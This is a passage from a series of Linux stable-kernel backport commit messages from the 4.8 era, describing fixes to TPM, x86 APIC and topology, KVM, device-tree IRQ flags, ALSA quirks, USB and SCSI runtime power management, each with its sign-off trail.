also the description in this mail thread
https://lists.linuxfoundation.org/pipermail/linux-pm/2009-November/023198.html
or the order of calls e.g. in usb_new_device.
The changed order also helps to avoid scenarios where runtime pm for
&shost->shost_gendev is activated whilst the parent is suspended,
resulting in error message "runtime PM trying to activate child device
hostx but parent yyy is not active".
In addition properly reverse the runtime pm calls in the error path.
Signed-off-by: Heiner Kallweit <hkallweit1@gmail.com>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fd44aa9a25 upstream.
The rcar_fcp_enable() function immediately returns successfully when the
FCP device pointer is NULL to avoid forcing the users to check the FCP
device manually before every call. However, the stub version of the
function used when the FCP driver is disabled returns -ENOSYS
unconditionally, resulting in a different API contract for the two
versions of the function.
As a user that requires FCP support will fail at probe time when calling
rcar_fcp_get() if the FCP driver is disabled, the stub version of the
rcar_fcp_enable() function will only be called with a NULL FCP device.
We can thus return 0 unconditionally to align the behaviour with the
normal version of the function.
Reported-by: Sergei Shtylyov <sergei.shtylyov@cogentembedded.com>
Signed-off-by: Laurent Pinchart <laurent.pinchart+renesas@ideasonboard.com>
Reviewed-by: Geert Uytterhoeven <geert+renesas@glider.be>
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 72fd50e14e upstream.
The req_canceled() callback is used by tpm_transmit() periodically to
check whether the request has been canceled while it is receiving a
response from the TPM.
The TPM_CRB_CTRL_CANCEL register was cleared already in the crb_cancel
callback, which has two consequences:
* Cancel might not happen.
* req_canceled() always returns zero.
A better place to clear the register is when starting to send a new
command. The behavior of TPM_CRB_CTRL_CANCEL is described in the
section 5.5.3.6 of the PTP specification.
Fixes: 30fc8d138e ("tpm: TPM 2.0 CRB Interface")
Signed-off-by: Jarkko Sakkinen <jarkko.sakkinen@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d4816edfe7 upstream.
Unseal and load operations should be done as an atomic operation. This
commit introduces unlocked tpm_transmit() so that tpm2_unseal_trusted()
can do the locking by itself.
Fixes: 0fe5480303 ("keys, trusted: seal/unseal with TPM 2.0 chips")
Signed-off-by: Jarkko Sakkinen <jarkko.sakkinen@linux.intel.com>
Reviewed-by: Jason Gunthorpe <jgunthorpe@obsidianresearch.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e71b9dff06 upstream.
Ima tries to call ->setxattr() on overlayfs dentry after having locked
underlying inode, which results in a deadlock.
Reported-by: Krisztian Litkey <kli@iki.fi>
Fixes: 4bacc9c923 ("overlayfs: Make f_path always point to the overlay and f_inode to the underlay")
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Cc: Mimi Zohar <zohar@linux.vnet.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dcf5907e0e upstream.
The Qualcomm SPMI GPIO and MPP lines are problematic: the
are fetched from the main MFD driver with platform_get_irq()
which means that at this point they will all be assigned the
flags set up for the interrupts in the device tree.
That is problematic since these are flagged as rising edge
and an this point the interrupt descriptor is assigned a
rising edge, while the only thing the GPIO/MPP drivers really
do is issue irq_get_irqchip_state() on the line to read it
out and to provide a .to_irq() helper for *other* IRQ
consumers.
If another device tree node tries to flag the same IRQ
for use as something else than rising edge, the kernel
irqdomain core will protest like this:
type mismatch, failed to map hwirq-NN for <FOO>!
Which is what happens when the device tree defines two
contradictory flags for the same interrupt line.
To work around this and alleviate the problem, assign 0
as flag for the interrupts taken by the PM GPIO and MPP
drivers. This will lead to the flag being unset, and a
second consumer requesting rising, falling, both or level
interrupts will be respected. This is what the qcom-pm*.dtsi
files already do.
Switched to using the symbolic name IRQ_TYPE_NONE so that
we get this more readable.
This misconfiguration was caused by a copy/pasting the
APQ8064 set-up, the latter has been fixed in a separate
patch.
Tested with one of the SPMI GPIOs: after this I can
successfully request one of these GPIOs as falling edge
from the device tree.
Fixes: 0840ea9e44 ("ARM: dts: add GPIO and MPP to MSM8660 PMIC")
Cc: Srinivas Kandagatla <srinivas.kandagatla@linaro.org>
Cc: Stephen Boyd <sboyd@codeaurora.org>
Cc: Björn Andersson <bjorn.andersson@linaro.org>
Cc: Ivan T. Ivanov <ivan.ivanov@linaro.org>
Cc: John Stultz <john.stultz@linaro.org>
Cc: Andy Gross <andy.gross@linaro.org>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Andy Gross <andy.gross@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ca88696e8b upstream.
The Qualcomm PMIC GPIO and MPP lines are problematic: the
are fetched from the main MFD driver with platform_get_irq()
which means that at this point they will all be assigned the
flags set up for the interrupts in the device tree.
That is problematic since these are flagged as rising edge
and an this point the interrupt descriptor is assigned a
rising edge, while the only thing the GPIO/MPP drivers really
do is issue irq_get_irqchip_state() on the line to read it
out and to provide a .to_irq() helper for *other* IRQ
consumers.
If another device tree node tries to flag the same IRQ
for use as something else than rising edge, the kernel
irqdomain core will protest like this:
type mismatch, failed to map hwirq-NN for <FOO>!
Which is what happens when the device tree defines two
contradictory flags for the same interrupt line.
To work around this and alleviate the problem, assign 0
as flag for the interrupts taken by the PM GPIO and MPP
drivers. This will lead to the flag being unset, and a
second consumer requesting rising, falling, both or level
interrupts will be respected. This is what the qcom-pm*.dtsi
files already do.
Switched to using the symbolic name IRQ_TYPE_NONE so that
we get this more readable.
Fixes: bce3604696 ("ARM: dts: apq8064: add pm8921 mpp support")
Fixes: 874443fe9e ("ARM: dts: apq8064: Add pm8921 mfd and its gpio node")
Cc: Srinivas Kandagatla <srinivas.kandagatla@linaro.org>
Cc: Stephen Boyd <sboyd@codeaurora.org>
Cc: Björn Andersson <bjorn.andersson@linaro.org>
Cc: Ivan T. Ivanov <ivan.ivanov@linaro.org>
Cc: John Stultz <john.stultz@linaro.org>
Cc: Andy Gross <andy.gross@linaro.org>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Andy Gross <andy.gross@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fb833b1fbb upstream.
Commit 215e362daf ("ARM: 8306/1: loop_udelay: remove bogomips value
limitation") tried to increase the bogomips limitation, but in doing
so messed up udelay such that it always gives about a 5% error in the
delay, even if we use a timer.
The calculation is:
loops = UDELAY_MULT * us_delay * ticks_per_jiffy >> UDELAY_SHIFT
Originally, UDELAY_MULT was ((UL(2199023) * HZ) >> 11) and UDELAY_SHIFT
30. Assuming HZ=100, us_delay of 1000 and ticks_per_jiffy of 1660000
(eg, 166MHz timer, 1ms delay) this would calculate:
((UL(2199023) * HZ) >> 11) * 1000 * 1660000 >> 30
=> 165999
With the new values of 2047 * HZ + 483648 * HZ / 1000000 and 31, we get:
(2047 * HZ + 483648 * HZ / 1000000) * 1000 * 1660000 >> 31
=> 158269
which is incorrect. This is due to a typo - correcting it gives:
(2147 * HZ + 483648 * HZ / 1000000) * 1000 * 1660000 >> 31
=> 165999
i.o.w, the original value.
Fixes: 215e362daf ("ARM: 8306/1: loop_udelay: remove bogomips value limitation")
Reviewed-by: Nicolas Pitre <nico@linaro.org>
Signed-off-by: Russell King <rmk+kernel@armlinux.org.uk>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 72b4f6a5e9 upstream.
On x86_32, when an interrupt happens from kernel space, SS and SP aren't
pushed and the existing stack is used. So pt_regs is effectively two
words shorter, and the previous stack pointer is normally the memory
after the shortened pt_regs, aka '®s->sp'.
But in the rare case where the interrupt hits right after the stack
pointer has been changed to point to an empty stack, like for example
when call_on_stack() is used, the address immediately after the
shortened pt_regs is no longer on the stack. In that case, instead of
'®s->sp', the previous stack pointer should be retrieved from the
beginning of the current stack page.
kernel_stack_pointer() wants to do that, but it forgets to dereference
the pointer. So instead of returning a pointer to the previous stack,
it returns a pointer to the beginning of the current stack.
Note that it's probably outside of kernel_stack_pointer()'s scope to be
switching stacks at all. The x86_64 version of this function doesn't do
it, and it would be better for the caller to do it if necessary. But
that's a patch for another day. This just fixes the original intent.
Signed-off-by: Josh Poimboeuf <jpoimboe@redhat.com>
Cc: Andy Lutomirski <luto@amacapital.net>
Cc: Andy Lutomirski <luto@kernel.org>
Cc: Borislav Petkov <bp@alien8.de>
Cc: Brian Gerst <brgerst@gmail.com>
Cc: Byungchul Park <byungchul.park@lge.com>
Cc: Denys Vlasenko <dvlasenk@redhat.com>
Cc: Frederic Weisbecker <fweisbec@gmail.com>
Cc: H. Peter Anvin <hpa@zytor.com>
Cc: Kees Cook <keescook@chromium.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Nilay Vaish <nilayvaish@gmail.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Steven Rostedt <rostedt@goodmis.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Fixes: 0788aa6a23 ("x86: Prepare removal of previous_esp from i386 thread_info structure")
Link: http://lkml.kernel.org/r/472453d6e9f6a2d4ab16aaed4935f43117111566.1471535549.git.jpoimboe@redhat.com
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2a51fe083e upstream.
When a CPU is physically added to a system then the MADT table is not
updated.
If subsequently a kdump kernel is started on that physically added CPU then
the ACPI enumeration fails to provide the information for this CPU which is
now the boot CPU of the kdump kernel.
As a consequence, generic_processor_info() is not invoked for that CPU so
the number of enumerated processors is 0 and none of the initializations,
including the logical package id management, are performed.
We have code which relies on the correctness of the logical package map and
other information which is initialized via generic_processor_info().
Executing such code will result in undefined behaviour or kernel crashes.
This problem applies only to the kdump kernel because a normal kexec will
switch to the original boot CPU, which is enumerated in MADT, before
jumping into the kexec kernel.
The boot code already has a check for num_processors equal 0 in
prefill_possible_map(). We can use that check as an indicator that the
enumeration of the boot CPU did not happen and invoke generic_processor_info()
for it. That initializes the relevant data for the boot CPU and therefore
prevents subsequent failure.
[ tglx: Refined the code and rewrote the changelog ]
Signed-off-by: Prarit Bhargava <prarit@redhat.com>
Fixes: 1f12e32f4c ("x86/topology: Create logical package id")
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Len Brown <len.brown@intel.com>
Cc: Borislav Petkov <bp@suse.de>
Cc: Andi Kleen <ak@linux.intel.com>
Cc: Jiri Olsa <jolsa@redhat.com>
Cc: Juergen Gross <jgross@suse.com>
Cc: dyoung@redhat.com
Cc: Eric Biederman <ebiederm@xmission.com>
Cc: kexec@lists.infradead.org
Link: http://lkml.kernel.org/r/1475514432-27682-1-git-send-email-prarit@redhat.com
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cff9ab2b29 upstream.
The array has a size of MAX_LOCAL_APIC, which can be as large as 32k, so it
can consume up to 128k.
The array has been there forever and was never used for anything useful
other than a version mismatch check which was introduced in 2009.
There is no reason to store the version in an array. The kernel is not
prepared to handle different APIC versions anyway, so the real important
part is to detect a version mismatch and warn about it, which can be done
with a single variable as well.
[ tglx: Massaged changelog ]
Signed-off-by: Denys Vlasenko <dvlasenk@redhat.com>
CC: Andy Lutomirski <luto@amacapital.net>
CC: Borislav Petkov <bp@alien8.de>
CC: Brian Gerst <brgerst@gmail.com>
CC: Mike Travis <travis@sgi.com>
Link: http://lkml.kernel.org/r/20160913181232.30815-1-dvlasenk@redhat.com
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d4b05923f5 upstream.
Our XSAVE features are divided into two categories: those that
generate FPU exceptions, and those that do not. MPX and pkeys do
not generate FPU exceptions and thus can not be used lazily. We
disable them when lazy mode is forced on.
We have a pair of masks to collect these two sets of features, but
XFEATURE_MASK_PKRU was added to the wrong mask: XFEATURE_MASK_LAZY.
Fix it by moving the feature to XFEATURE_MASK_EAGER.
Note: this only causes problem if you boot with lazy FPU mode
(eagerfpu=off) which is *not* the default. It also only affects
hardware which is not currently publicly available. It looks like
eager mode is going away, but we still need this patch applied
to any kernel that has protection keys and lazy mode, which is 4.6
through 4.8 at this point, and 4.9 if the lazy removal isn't sent
to Linus for 4.9.
Fixes: c8df400984 ("x86/fpu, x86/mm/pkeys: Add PKRU xsave fields and data structures")
Signed-off-by: Dave Hansen <dave.hansen@intel.com>
Cc: Dave Hansen <dave@sr71.net>
Link: http://lkml.kernel.org/r/20161007162342.28A49813@viggo.jf.intel.com
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit db91aa793f upstream.
When a CPU is about to be offlined we call fixup_irqs() that resets IRQ
affinities related to the CPU in question. The same thing is also done when
the system is suspended to S-states like S3 (mem).
For each IRQ we try to complete any on-going move regardless whether the
IRQ is actually part of x86_vector_domain. For each IRQ descriptor we fetch
its chip_data, assume it is of type struct apic_chip_data and manipulate it
by clearing old_domain mask etc. For irq_chips that are not part of the
x86_vector_domain, like those created by various GPIO drivers, will find
their chip_data being changed unexpectly.
Below is an example where GPIO chip owned by pinctrl-sunrisepoint.c gets
corrupted after resume:
# cat /sys/kernel/debug/gpio
gpiochip0: GPIOs 360-511, parent: platform/INT344B:00, INT344B:00:
gpio-511 ( |sysfs ) in hi
# rtcwake -s10 -mmem
<10 seconds passes>
# cat /sys/kernel/debug/gpio
gpiochip0: GPIOs 360-511, parent: platform/INT344B:00, INT344B:00:
gpio-511 ( |sysfs ) in ?
Note '?' in the output. It means the struct gpio_chip ->get function is
NULL whereas before suspend it was there.
Fix this by first checking that the IRQ belongs to x86_vector_domain before
we try to use the chip_data as struct apic_chip_data.
Reported-and-tested-by: Sakari Ailus <sakari.ailus@linux.intel.com>
Signed-off-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Link: http://lkml.kernel.org/r/20161003101708.34795-1-mika.westerberg@linux.intel.com
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b5e7307d9d upstream.
In some places, dump_backtrace() is called with a NULL tsk parameter,
e.g. in bug_handler() in arch/arm64, or indirectly via show_stack() in
core code. The expectation is that this is treated as if current were
passed instead of NULL. Similar is true of unwind_frame().
Commit a80a0eb70c ("arm64: make irq_stack_ptr more robust") didn't
take this into account. In dump_backtrace() it compares tsk against
current *before* we check if tsk is NULL, and in unwind_frame() we never
set tsk if it is NULL.
Due to this, we won't initialise irq_stack_ptr in either function. In
dump_backtrace() this results in calling dump_mem() for memory
immediately above the IRQ stack range, rather than for the relevant
range on the task stack. In unwind_frame we'll reject unwinding frames
on the IRQ stack.
In either case this results in incomplete or misleading backtrace
information, but is not otherwise problematic. The initial percpu areas
(including the IRQ stacks) are allocated in the linear map, and dump_mem
uses __get_user(), so we shouldn't access anything with side-effects,
and will handle holes safely.
This patch fixes the issue by having both functions handle the NULL tsk
case before doing anything else with tsk.
Signed-off-by: Mark Rutland <mark.rutland@arm.com>
Fixes: a80a0eb70c ("arm64: make irq_stack_ptr more robust")
Acked-by: James Morse <james.morse@arm.com>
Cc: Catalin Marinas <catalin.marinas@arm.com>
Cc: Will Deacon <will.deacon@arm.com>
Cc: Yang Shi <yang.shi@linaro.org>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ac0e89bb47 upstream.
We use logical negate where bitwise negate was intended. It means that
we never return -EINVAL here.
Fixes: ce11e48b7f ('KVM: PPC: E500: Add userspace debug stub support')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Reviewed-by: Alexander Graf <agraf@suse.de>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0099b7701f upstream.
If the vgic hasn't been created and initialized, we shouldn't attempt to
look at its data structures or flush/sync anything to the GIC hardware.
This fixes an issue reported by Alexander Graf when using a userspace
irqchip.
Fixes: 0919e84c0f ("KVM: arm/arm64: vgic-new: Add IRQ sync/flush framework")
Reported-by: Alexander Graf <agraf@suse.de>
Acked-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Christoffer Dall <christoffer.dall@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6fe407f2d1 upstream.
If userspace creates a PMU for the VCPU, but doesn't create an in-kernel
irqchip, then we end up in a nasty path where we try to take an
uninitialized spinlock, which can lead to all sorts of breakages.
Luckily, QEMU always creates the VGIC before the PMU, so we can
establish this as ABI and check for the VGIC in the PMU init stage.
This can be relaxed at a later time if we want to support PMU with a
userspace irqchip.
Cc: Shannon Zhao <shannon.zhao@linaro.org>
Acked-by: Marc Zyngier <marc.zyngier@arm.com>
Signed-off-by: Christoffer Dall <christoffer.dall@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 91e4f1b607 upstream.
When a guest TLB entry is replaced by TLBWI or TLBWR, we only invalidate
TLB entries on the local CPU. This doesn't work correctly on an SMP host
when the guest is migrated to a different physical CPU, as it could pick
up stale TLB mappings from the last time the vCPU ran on that physical
CPU.
Therefore invalidate both user and kernel host ASIDs on other CPUs,
which will cause new ASIDs to be generated when it next runs on those
CPUs.
We're careful only to do this if the TLB entry was already valid, and
only for the kernel ASID where the virtual address it mapped is outside
of the guest user address range.
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Cc: Paolo Bonzini <pbonzini@redhat.com>
Cc: "Radim Krčmář" <rkrcmar@redhat.com>
Cc: Ralf Baechle <ralf@linux-mips.org>
Cc: linux-mips@linux-mips.org
Cc: kvm@vger.kernel.org
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fa73c3b25b upstream.
The MMCR2 register is available twice, one time with number 785
(privileged access), and one time with number 769 (unprivileged,
but it can be disabled completely). In former times, the Linux
kernel was using the unprivileged register 769 only, but since
commit 8dd75ccb57 ("powerpc: Use privileged SPR number
for MMCR2"), it uses the privileged register 785 instead.
The KVM-PR code then of course also switched to use the SPR 785,
but this is causing older guest kernels to crash, since these
kernels still access 769 instead. So to support older kernels
with KVM-PR again, we have to support register 769 in KVM-PR, too.
Fixes: 8dd75ccb57
Signed-off-by: Thomas Huth <thuth@redhat.com>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a6a198bc60 upstream.
Early during boot topology_update_package_map() computes
logical_pkg_ids for all present processors.
Later, when processors are brought up, identify_cpu() updates
these values based on phys_pkg_id which is a function of
initial_apicid. On PV guests the latter may point to a
non-existing node, causing logical_pkg_ids to be set to -1.
Intel's RAPL uses logical_pkg_id (as topology_logical_package_id())
to index its arrays and therefore in this case will point to index
65535 (since logical_pkg_id is a u16). This could lead to either a
crash or may actually access random memory location.
As a workaround, we recompute topology during CPU bringup to reset
logical_pkg_id to a valid value.
(The reason for initial_apicid being bogus is because it is
initial_apicid of the processor from which the guest is launched.
This value is CPUID(1).EBX[31:24])
Signed-off-by: Boris Ostrovsky <boris.ostrovsky@oracle.com>
Signed-off-by: David Vrabel <david.vrabel@citrix.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 88003fb10f upstream.
This fixes a compile failure:
drivers/built-in.o: In function `wm8350_i2c_probe':
core.c:(.text+0x828b0): undefined reference to `__devm_regmap_init_i2c'
Makefile:953: recipe for target 'vmlinux' failed
Fixes: 52b461b86a ("mfd: Add regmap cache support for wm8350")
Signed-off-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
Acked-by: Charles Keepax <ckeepax@opensource.wolfsonmicro.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9a6dc64451 upstream.
set_bit() and clear_bit() take the bit number so this code is really
doing "1 << (1 << irq)" which is a double shift bug. It's done
consistently so it won't cause a problem unless "irq" is more than 4.
Fixes: 70c6cce040 ('mfd: Support 88pm80x in 80x driver')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2c2469bc03 upstream.
readl_poll_timeout() calls usleep_range(), but
regmap_atmel_hlcdc_reg_write() is called in atomic context (regmap
spinlock held).
Replace the readl_poll_timeout() call by readl_poll_timeout_atomic().
Fixes: ea31c0cf9b ("mfd: atmel-hlcdc: Implement config synchronization")
Signed-off-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8dcc5ff8fc upstream.
Member "status" of struct usb_sg_request is managed by usb core. A
spin lock is used to serialize the change of it. The driver could
check the value of req->status, but should avoid changing it without
the hold of the spinlock. Otherwise, it could cause race or error
in usb core.
This patch could be backported to stable kernels with version later
than v3.14.
Cc: Alan Stern <stern@rowland.harvard.edu>
Cc: Roger Tseng <rogerable@realtek.com>
Signed-off-by: Lu Baolu <baolu.lu@linux.intel.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8da08ca03b upstream.
Currently, usb-line6 module exports an array of MIDI manufacturer ID and
usb-pod module uses it. However, the declaration is not the definition in
common header. The difference is explicit length of array. Although
compiler calculates it and everything goes well, it's better to use the
same representation between definition and declaration.
This commit fills the length of array for usb-line6 module. As a small
good sub-effect, this commit suppress below warnings from static analysis
by sparse v0.5.0.
sound/usb/line6/driver.c:274:43: error: cannot size expression
sound/usb/line6/driver.c:275:16: error: cannot size expression
sound/usb/line6/driver.c:276:16: error: cannot size expression
sound/usb/line6/driver.c:277:16: error: cannot size expression
Fixes: 705ececd1c ("Staging: add line6 usb driver")
Signed-off-by: Takashi Sakamoto <o-takashi@sakamocchi.jp>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit eb1a74b7be upstream.
The DragonFly quirk added in 42e3121d90 ("ALSA: usb-audio: Add a more
accurate volume quirk for AudioQuest DragonFly") applies a custom dB map
on the volume control when its range is reported as 0..50 (0 .. 0.2dB).
However, there exists at least one other variant (hw v1.0c, as opposed
to the tested v1.2) which reports a different non-sensical volume range
(0..53) and the custom map is therefore not applied for that device.
This results in all of the volume change appearing close to 100% on
mixer UIs that utilize the dB TLV information.
Add a fallback case where no dB TLV is reported at all if the control
range is not 0..50 but still 0..N where N <= 1000 (3.9 dB). Also
restrict the quirk to only apply to the volume control as there is also
a mute control which would match the check otherwise.
Fixes: 42e3121d90 ("ALSA: usb-audio: Add a more accurate volume quirk for AudioQuest DragonFly")
Signed-off-by: Anssi Hannula <anssi.hannula@iki.fi>
Reported-by: David W <regulars@d-dub.org.uk>
Tested-by: David W <regulars@d-dub.org.uk>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit db68577966 upstream.
The pointer callbacks of ali5451 driver may return the value at the
boundary occasionally, and it results in the kernel warning like
snd_ali5451 0000:00:06.0: BUG: , pos = 16384, buffer size = 16384, period size = 1024
It seems that folding the position offset is enough for fixing the
warning and no ill-effect has been seen by that.
Reported-by: Enrico Mioso <mrkiko.rs@gmail.com>
Tested-by: Enrico Mioso <mrkiko.rs@gmail.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 919ab2524c upstream.
The musb driver calls into this phy driver to disable/enable squelch
detection. This function was introduced in 24fe86a617 ("phy: sun4i-usb:
Add a sunxi specific function for setting squelch-detect"). This
function in turn calls sun4i_usb_phy_write, which uses a mutex to
guard the common access register. Unfortunately musb does this
in atomic context, which results in the following warning with lock
debugging enabled:
BUG: sleeping function called from invalid context at kernel/locking/mutex.c:97
in_atomic(): 1, irqs_disabled(): 128, pid: 96, name: kworker/0:2
CPU: 0 PID: 96 Comm: kworker/0:2 Not tainted 4.8.0-rc4-00181-gd502f8ad1c3e #13
Hardware name: Allwinner sun8i Family
Workqueue: events musb_deassert_reset
[<c010bc01>] (unwind_backtrace) from [<c0109237>] (show_stack+0xb/0xc)
[<c0109237>] (show_stack) from [<c02a669b>] (dump_stack+0x67/0x74)
[<c02a669b>] (dump_stack) from [<c05d68c9>] (mutex_lock+0x15/0x2c)
[<c05d68c9>] (mutex_lock) from [<c02c3589>] (sun4i_usb_phy_write+0x39/0xec)
[<c02c3589>] (sun4i_usb_phy_write) from [<c03e6327>] (musb_port_reset+0xfb/0x184)
[<c03e6327>] (musb_port_reset) from [<c03e4917>] (musb_deassert_reset+0x1f/0x2c)
[<c03e4917>] (musb_deassert_reset) from [<c012ecb5>] (process_one_work+0x129/0x2b8)
[<c012ecb5>] (process_one_work) from [<c012f5e3>] (worker_thread+0xf3/0x424)
[<c012f5e3>] (worker_thread) from [<c0132dbd>] (kthread+0xa1/0xb8)
[<c0132dbd>] (kthread) from [<c0105f31>] (ret_from_fork+0x11/0x20)
Since the register access is mmio, we can use a spinlock to guard this
specific access, rather than the mutex that guards the entire phy.
Fixes: ba4bdc9e1d ("PHY: sunxi: Add driver for sunxi usb phy")
Cc: Hans de Goede <hdegoede@redhat.com>
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Reviewed-by: Hans de Goede <hdegoede@redhat.com>
Signed-off-by: Kishon Vijay Abraham I <kishon@ti.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5e6c88d28c upstream.
Commit 50c763f8c1 ("usb: dwc3: Set the ClearPendIN bit on Clear
Stall EP command") sets ClearPendIN bit for all IN endpoints of
v2.60a+ cores. This causes ClearStall command fails on 2.60+ cores
operating in HighSpeed mode.
In page 539 of 2.60a specification:
"When issuing Clear Stall command for IN endpoints in SuperSpeed
mode, the software must set the "ClearPendIN" bit to '1' to
clear any pending IN transcations, so that the device does not
expect any ACK TP from the host for the data sent earlier."
It's obvious that we only need to apply this rule to those IN
endpoints that currently operating in SuperSpeed mode.
Fixes: 50c763f8c1 ("usb: dwc3: Set the ClearPendIN bit on Clear Stall EP command")
Signed-off-by: Lu Baolu <baolu.lu@linux.intel.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a094760b9a upstream.
Since commit 71723f9546 "PM / runtime: print error when activating a
child to unactive parent" I see the following error message:
scsi host2: usb-storage 1-3:1.0
scsi host2: runtime PM trying to activate child device host2 but parent
(1-3:1.0) is not active
Digging into it it seems to be related to the problem described in the
commit message for cd998ded5c "i2c: designware: Prevent runtime
suspend during adapter registration" as scsi_add_host also calls
device_add and after the call to device_add the parent device is
suspended.
Fix this by using the approach from the mentioned commit and getting
the runtime pm reference before calling scsi_add_host.
Signed-off-by: Heiner Kallweit <hkallweit1@gmail.com>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0eec880966 upstream.
HP Spectre x360 with CX20724 codec has two speaker outputs while the
BIOS sets up only the bottom one (NID 0x17) and disables the top one
(NID 0x1d).
This patch adds a fixup simply defining the proper pincfg for NID 0x1d
so that the top speaker works as is.
Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=169071
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3f640970a4 upstream.
One of the laptops has the codec ALC256 on it, applying the
ALC255_FIXUP_DELL1_MIC_NO_PRESENCE can fix the problem, the rest
of laptops have the codec ALC295 on them, they are similar to machines
with ALC225, applying the ALC269_FIXUP_DELL1_MIC_NO_PRESENCE can fix
the problem.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 392c9da24a upstream.
We have two new Dell laptop models, they have the same ALC255 pin
definition, but not in the pin quirk table yet, as a result, the
headset microphone can't work. After adding the definition in the
table, the headset microphone works well.
Signed-off-by: Hui Wang <hui.wang@canonical.com>
Signed-off-by: Takashi Iwai <tiwai@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ab21b63e8a upstream.
This reverts commit e6c7efdcb7.
Turns out it was totally wrong. The memory is supposed to be bound to
the kref, as the original code was doing correctly, not the
device/driver binding as the devm_kzalloc() would cause.
This fixes an oops when read would be called after the device was
unbound from the driver.
Reported-by: Ladislav Michl <ladis@linux-mips.org>
Cc: Andy Shevchenko <andriy.shevchenko@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 238b7bd91b upstream.
In v_recv_cmd_submit(), urb_p->urb->pipe has the type unsigned int
(which is 32-bit long on x86_64) but 11<<30 results in a 34-bit integer.
Therefore the 2 leading bits are truncated and
urb_p->urb->pipe &= ~(11 << 30);
has the same meaning as
urb_p->urb->pipe &= ~(3 << 30);
This second statement seems to be how the code was intended to be
written, as PIPE_ constants have values between 0 and 3.
The overflow has been detected with a clang warning:
drivers/usb/usbip/vudc_rx.c:145:27: warning: signed shift result
(0x2C0000000) requires 35 bits to represent, but 'int' only has 32
bits [-Wshift-overflow]
